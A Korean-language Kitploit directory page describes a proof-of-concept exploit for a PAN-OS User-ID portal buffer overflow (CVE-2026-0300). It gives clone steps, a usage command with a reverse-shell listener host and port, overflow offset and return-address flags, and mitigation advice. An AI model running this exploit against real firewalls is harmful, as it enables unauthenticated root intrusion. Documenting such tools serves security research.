Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-0300-POC — CVE-2026-0300에 대한 개념 증명(PoC)으로, PAN-OS User-ID Portal의 치명적인 버퍼 오버플로우로 인해 인증 없이 루트 권한으로 원격 코드 실행이 가능합니다. | Kitploit
도구/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

CVE-2026-0300에 대한 개념 증명(PoC)으로, PAN-OS User-ID Portal의 치명적인 버퍼 오버플로우로 인해 인증 없이 루트 권한으로 원격 코드 실행이 가능합니다.

저장소 보기
21113개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ CVE-2026-0300: PAN-OS User-ID™ 포털 RCE 분석

연구 PoC: CWE-787 범위 밖 쓰기(Out-of-bounds Write)

Security Python License Dependencies

📌 개요

CVE-2026-0300은 Palo Alto Networks PAN-OS User-ID™ 인증 포털(캡티브 포털)에서 식별된 높은 심각도의 버퍼 오버플로 취약점입니다. 본 연구 저장소는 인증되지 않은 네트워크 패킷이 어떻게 루트 권한을 가진 원격 코드 실행(RCE) 으로 이어질 수 있는지에 초점을 맞춰 취약점의 기술적 로직을 시연합니다.


📊 취약점 분석

기능세부 사항
CVE IDCVE-2026-0300
심각도 점수9.3 (Critical)
취약점 유형CWE-787: 범위 밖 쓰기(Out-of-bounds Write)
공격 벡터네트워크 (인증 없음)
필요 권한없음
사용자 상호작용없음
영향받는 소프트웨어PAN-OS 12.1, 11.2, 11.1, 10.2

🔬 기술적 메커니즘

이 취약점은 User-ID 인증 포털 서비스가 메모리 버퍼에 데이터를 쓰기 전에 수신 데이터의 길이를 검증하지 못할 때 발생합니다.

  1. 버퍼: 서비스는 포털 요청을 처리하기 위해 고정 크기의 메모리 영역을 할당합니다.
  2. 오버플로: 특수하게 제작된 POST 요청이 이 크기를 초과하는 페이로드를 전송합니다.
  3. 덮어쓰기: 초과 데이터가 스택/힙을 덮어써서 공격자가 명령 포인터(EIP/RIP) 를 제어하고 임의의 셸코드를 실행할 수 있게 합니다.

🛠️ 설치 및 설정

1. 사전 요구 사항

  • Python 3.9 이상.
  • 외부 라이브러리 필요 없음 (표준 socket, struct, argparse 사용).

2. 연구 도구 복제

저장소 복제

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

폴더로 이동

root@kitploit:~
cd CVE-2026-0300-POC

스크립트 실행 권한 부여

root@kitploit:~
chmod +x research_poc.py

🚀 사용 가이드

이 도구는 전문적인 CLI(명령줄 인터페이스)로 설계되었습니다.

기본 명령

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

고급 매개변수

플래그이름설명기본값
-t--target(필수) 방화벽의 대상 IP 주소.N/A
-p--portUser-ID 포털이 실행 중인 포트.6082
-o--offset메모리 오버플로 지점에 도달하는 바이트 길이.2048
-r--ret16진수 반환 주소.0xdeadbeef
-l--lhost리버스 셸 IP 주소사용자 IP
-L--lport리스너 포트4444

🛡️ 완화 및 안전

  • PAN-OS 업데이트: 최신 보안 패치 설치 (2026년 5월 릴리스).
  • IP 제한: 포털 액세스를 신뢰할 수 있는 내부 IP 영역으로 제한.
  • 포털 비활성화: User-ID 인증이 필요하지 않은 경우 기능을 비활성화.

⚠️ 윤리적 및 법적 고지

교육 및 승인된 연구 목적으로만 사용하십시오. 소유하지 않은 시스템에 대한 무단 테스트는 불법입니다. 저자는 이 연구 코드의 오용에 대해 책임을 지지 않습니다. 글로벌 보안을 개선하기 위해 책임감 있게 사용하십시오. 개발자: https://t.me/p3Nt3st3rsTAr 취약점 발견 날짜: 2026년 5월 7일

도구 다운로드